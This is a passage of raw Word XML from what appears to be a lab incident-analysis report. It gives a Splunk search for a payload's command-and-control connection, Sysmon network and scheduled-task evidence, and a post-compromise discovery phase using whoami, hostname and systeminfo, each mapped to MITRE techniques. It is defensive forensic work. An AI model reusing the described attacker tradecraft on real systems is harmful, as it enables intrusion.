          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Payload-to-C2 Search</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="96" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10052"/>
      </w:tblGrid>
      <w:tr w14:paraId="5C0F8264">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10052" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="4BFE8A68">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xml:space="preserve">index=_internal host="Sh-Win10" EventCode=3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FC0652">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search Image="*\\FreeClude.exe" DestinationIp="192.168.110.141" DestinationPort=33398</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3168ACC4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">| table _time host Image ProcessGuid ProcessId Protocol SourceIp SourcePort DestinationIp DestinationPort </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581B83D4"/>
    <w:p w14:paraId="254117BA">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Key supplied Sysmon evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36708F32">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06416581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Network Connection (Event 3)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="3C8F8CBF">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7F9F0301">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:10:36.462</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E53C3B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="517E003C">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64DA68B5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessId: 5568</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A045F4F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessGuid: {4736c562-214c-6ab5-f802-000000001c00}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A93E5F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D597A91">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Protocol: tcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C3D405">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initiated: true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F91B77">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4774F80D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SourceIp: 192.168.110.156</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2476C80D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SourcePort: 55196</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA59AF4">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42E09CAD">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DestinationIp: 192.168.110.141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A08E54D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DestinationPort: 33398</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34D17E9E">
      <w:pPr>
        <w:pStyle w:val="170"/>
        <w:spacing w:after="40"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A8901B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Registry Value Set — Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="74DA28B0">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1FCFAD59">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:14:42.631</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668046C2">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58F227D5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessId: 1160</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B5CFE6">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01F16A8E">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Windows\system32\svchost.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AF50E3">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="670313BF">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TargetObject: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Work\Index</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A784878">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50AE2464">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EventType: SetValue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E47829">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C7E03D5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Details: DWORD (0x00000003)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E969C2">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D58D329">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CA4C5D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75B610C5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique: T1053 — Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67BA141F"/>
    <w:p w14:paraId="334C4BDD"/>
    <w:p w14:paraId="33F13459">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C73F74E">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>08 / DISCOVERY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223742D">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4 — Post-Compromise Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CF0371">
      <w:pPr>
        <w:pStyle w:val="36"/>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 xml:space="preserve">Discovery begins after the shell is established, as the operator uses native Windows utilities to identify the current user and gather basic host information. The observed sequence includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hostname.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>systeminfo.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> returning </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SH-WIN10\saad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. These commands provide direct evidence for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T1033 — System Owner/User Discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T1082 — System Information Discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D517F">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The discovery activity should be correlated through the parent process and ProcessGuid to determine whether the commands originated from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell associated with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FreeClude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
